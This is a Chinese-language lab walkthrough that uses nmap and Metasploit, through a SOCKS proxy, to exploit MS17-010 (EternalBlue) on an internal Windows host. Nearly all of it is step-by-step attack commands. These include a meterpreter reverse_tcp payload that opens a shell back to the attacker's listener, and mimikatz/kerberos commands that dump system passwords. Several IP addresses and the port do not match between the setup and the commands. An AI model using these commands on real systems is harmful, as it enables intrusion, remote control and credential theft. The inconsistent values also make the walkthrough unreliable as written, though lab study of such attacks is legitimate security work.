实验环境:
攻击(攻击者)主机: : | Kali2020.2 虚拟机 |
| 192.168.254.132 |
目标(跳板机)主机: | Windows2008 虚拟机 | Nat vmnet1 | 192.168.254.176 192.168.10.12 |
目标主机 | Windows2007 虚拟机 | Vmnet1 | 192.168.10.11 |
nmap
查看漏洞探测的脚本,
【命令】
cd /usr/share/nmap/script //进入脚本目录下
ls | grep vuln //查找vuln漏洞脚本,找到ms17-010漏洞脚本
使用smb-vuln-ms17-010.nse对192.168.10.12进行漏洞扫描,出现以下界面说明有漏洞,
【命令】这里使用的是socks进行代理进行连接的:
proxychains nmap -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.10.12
//使用smb-vuln-ms17-010.nse对192.168.10.12进行漏洞扫描,出现以下界面说明有漏洞
msfconsole
查看漏洞扫描模块:
【命令】
proxychains msfconsole //使用proxychains代理启动msfconsole
search scanner或search 17_010 //search搜索相应的模块
代理服务器已经开启了,
进行漏洞探测,
【命令】
use auxiliary/scanner/smb/smb_ms17_010 //使用smb_ms17_010模块
show options //查看需要设置的选项
set rhosts 192.168.10.1/24 //对整个ip段进行扫描
set threads 10 //设置线程,这里为10个线程
exploit //开始进行扫描
使用攻击模式进行攻击,
【命令】
use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue攻击模块进行攻击
set payload windows/x64/meterpreter/reverse_tcp //使用攻击载荷
set rhost 172.16.10.11 //内网中的另一台主机win7,一般win7旗舰版可以攻击成功
set lhost 192.168.100.128 //设置本机监听
set lport 555 //设置本机监听端口为5555
exploit //进行攻击
//注意,攻击成功会返回目标主机的meterpreter 的shell权限,获得meterpreter后,进行以下操作:
getuid // 查看当前用户
load mimikatz //加载mimikaz
mimikatz_command //使用mimikaz
kerberos //使用kerberos可以对系统密码进行抓取
//单独输入一个?可以查看用法